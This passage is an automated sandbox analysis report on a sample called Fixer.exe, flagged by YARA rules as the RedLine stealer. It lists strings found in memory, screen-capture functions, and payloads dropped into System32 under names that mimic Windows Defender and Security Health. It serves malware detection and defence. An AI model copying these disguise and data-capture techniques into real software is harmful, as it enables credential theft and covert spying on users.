                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14V
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: FixerNerest.exe, 00000003.00000002.52862644095.000000001BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52856212336.000000001B4F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmC:
                      Source: Fixer.exeString found in binary or memory: https://api.ip.sb/ip
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab0
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to capture screen (.Net source)
                      Source: 6z9uno0baqvej0me.exe.0.dr, BeNEQBpvCUYMUQvO.cs.Net Code: kgykxlqrmnxrTJvFK
                      Source: FixerNerest.exe.0.dr, QEEFRJhvySTxMB.cs.Net Code: zZqXIBvmIbEvDhSnLgO
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, BeNEQBpvCUYMUQvO.cs.Net Code: kgykxlqrmnxrTJvFK
                      Source: Defender.exe.3.dr, QEEFRJhvySTxMB.cs.Net Code: zZqXIBvmIbEvDhSnLgO

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: Fixer.exe, type: SAMPLEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                      Source: 0.0.Fixer.exe.670000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                      Drops large PE files
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile dump: xdwdSecurityHealthSystrays.exe.2.dr 735522883Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeFile dump: Defender.exe.3.dr 753276147Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3CD080 NtProtectVirtualMemory,2_2_00007FFA1B3CD080
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3E17CD NtProtectVirtualMemory,3_2_00007FFA1B3E17CD
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3AD080 NtProtectVirtualMemory,13_2_00007FFA1B3AD080
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3AD080 NtProtectVirtualMemory,19_2_00007FFA1B3AD080
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3D17CD NtProtectVirtualMemory,20_2_00007FFA1B3D17CD
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3AD080 NtProtectVirtualMemory,21_2_00007FFA1B3AD080
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B3A17CD NtProtectVirtualMemory,22_2_00007FFA1B3A17CD
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DD080 NtProtectVirtualMemory,23_2_00007FFA1B3DD080
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3B17CD NtProtectVirtualMemory,24_2_00007FFA1B3B17CD
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile created: C:\Windows\System32\xdwdSecurityHealthSystrays.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile created: C:\Windows\xdwd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeFile created: C:\Windows\System32\Defender.exeJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_029CDD440_2_029CDD44
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_0623ADB80_2_0623ADB8
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_0623DBD80_2_0623DBD8
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_062357900_2_06235790
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_0623E4E10_2_0623E4E1
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_0623E4F00_2_0623E4F0
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_062393A00_2_062393A0
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_0623ADA80_2_0623ADA8
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_0623DBC80_2_0623DBC8
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_062398B80_2_062398B8
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3CC8322_2_00007FFA1B3CC832
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3D1C8C2_2_00007FFA1B3D1C8C
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3CD0782_2_00007FFA1B3CD078
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3CEB042_2_00007FFA1B3CEB04
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3C7F302_2_00007FFA1B3C7F30
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3CBA862_2_00007FFA1B3CBA86
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3D5A7F2_2_00007FFA1B3D5A7F
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3CE28E2_2_00007FFA1B3CE28E
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3D0A472_2_00007FFA1B3D0A47
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3D26792_2_00007FFA1B3D2679
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3CDD202_2_00007FFA1B3CDD20
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3C51802_2_00007FFA1B3C5180
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3C03D82_2_00007FFA1B3C03D8
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3D275F2_2_00007FFA1B3D275F
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3D1DD72_2_00007FFA1B3D1DD7
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3CDCE92_2_00007FFA1B3CDCE9
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3C0D6D2_2_00007FFA1B3C0D6D
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3E23FB3_2_00007FFA1B3E23FB
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3E242B3_2_00007FFA1B3E242B
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3DC7E63_2_00007FFA1B3DC7E6
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3D82DB3_2_00007FFA1B3D82DB
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3DD5923_2_00007FFA1B3DD592
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3DED493_2_00007FFA1B3DED49
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3E24363_2_00007FFA1B3E2436
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3E23C23_2_00007FFA1B3E23C2
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3E23ED3_2_00007FFA1B3E23ED
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3D60583_2_00007FFA1B3D6058
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3D52283_2_00007FFA1B3D5228
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3D8E303_2_00007FFA1B3D8E30
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3E29E73_2_00007FFA1B3E29E7
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3D55DA3_2_00007FFA1B3D55DA
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 3_2_00007FFA1B3DF9803_2_00007FFA1B3DF980
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3B1C8C13_2_00007FFA1B3B1C8C
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3AC8B113_2_00007FFA1B3AC8B1
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3AD07813_2_00007FFA1B3AD078
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3AEB0413_2_00007FFA1B3AEB04
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3ABB0113_2_00007FFA1B3ABB01
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3A7F3013_2_00007FFA1B3A7F30
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3A622013_2_00007FFA1B3A6220
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3B0A9713_2_00007FFA1B3B0A97
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3AE28E13_2_00007FFA1B3AE28E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3B267913_2_00007FFA1B3B2679
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3B351D13_2_00007FFA1B3B351D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3ADD2013_2_00007FFA1B3ADD20
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3B353113_2_00007FFA1B3B3531
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3A518013_2_00007FFA1B3A5180
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3A03D813_2_00007FFA1B3A03D8
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3A033B13_2_00007FFA1B3A033B
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3B275F13_2_00007FFA1B3B275F
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3B1DD713_2_00007FFA1B3B1DD7
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3B3E9E13_2_00007FFA1B3B3E9E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3B410F13_2_00007FFA1B3B410F
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3ADCE913_2_00007FFA1B3ADCE9
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 13_2_00007FFA1B3A0D6D13_2_00007FFA1B3A0D6D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3A622019_2_00007FFA1B3A6220
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3AC83219_2_00007FFA1B3AC832
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3ABA8619_2_00007FFA1B3ABA86
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 19_2_00007FFA1B3B1C8C19_2_00007FFA1B3B1C8C
